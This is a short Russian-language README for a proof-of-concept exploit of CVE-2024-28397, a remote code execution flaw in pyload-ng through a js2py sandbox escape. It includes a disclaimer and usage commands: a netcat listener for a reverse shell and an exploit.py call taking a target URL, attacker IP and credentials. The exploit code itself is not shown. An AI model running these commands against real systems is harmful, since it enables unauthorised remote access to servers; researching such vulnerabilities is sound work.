
Эксплойт PoC для CVE-2024-28397 – удалённое выполнение кода в pyload-ng через обход песочницы js2py
Этот репозиторий содержит Proof-of-Concept (PoC) эксплойт для CVE-2024-28397 — уязвимости удалённого выполнения кода, затрагивающей pyload-ng из-за небезопасного использования js2py.
Дисклеймер:
Данный PoC предназначен только для образовательных и исследовательских целей.
Не используйте его на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за любое неправомерное использование этого кода.
js2py в pyload-ngВам понадобятся Python 3.x, библиотека requests и netcat для приёма обратной оболочки (reverse shell).
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123